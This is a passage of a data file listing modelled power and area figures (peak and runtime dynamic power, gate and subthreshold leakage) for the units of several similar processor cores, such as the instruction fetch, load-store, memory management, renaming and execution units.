'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.191831,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.25848,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.29424,
'Instruction Fetch Unit/Runtime Dynamic': 0.541028,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00652957,
'L2/Runtime Dynamic': 0.00197975,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.07704,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.405711,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0271736,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0271736,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.20536,
'Load Store Unit/Runtime Dynamic': 0.566895,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0670054,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.134011,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0237804,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.023878,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.300983,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0314488,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.497942,
'Memory Management Unit/Runtime Dynamic': 0.0553268,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.0529,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.353115,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0158113,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.122071,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.490997,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.95639,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.140137,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.312759,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.710538,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.255198,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.411625,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.207775,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.874599,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.182937,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.45936,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.134236,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0107042,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.13175,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0791639,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.265986,
'Execution Unit/Register Files/Runtime Dynamic': 0.089868,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.312602,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.617547,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.30015,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00125961,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00125961,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00116094,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00048432,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.0011372,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00481736,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00979706,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0761022,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.84076,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.191828,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.258477,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.2942,
'Instruction Fetch Unit/Runtime Dynamic': 0.541022,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00652957,
'L2/Runtime Dynamic': 0.00198512,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.07703,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.405709,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0271731,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.027173,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.20535,
'Load Store Unit/Runtime Dynamic': 0.56689,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0670041,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.134008,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.02378,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0238775,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.30098,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0314484,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.497939,
'Memory Management Unit/Runtime Dynamic': 0.055326,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.0528,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.353114,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0158112,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.12207,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.490994,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.95637,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.140124,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.312748,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.710444,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.255125,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.411508,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.207715,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.874348,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.182869,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.45908,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.134218,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0107011,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.131724,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0791412,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.265942,
'Execution Unit/Register Files/Runtime Dynamic': 0.0898423,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.312544,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.617394,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.29971,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00125902,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00125902,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00116041,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00048411,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00113687,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00481532,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00979174,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0760805,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
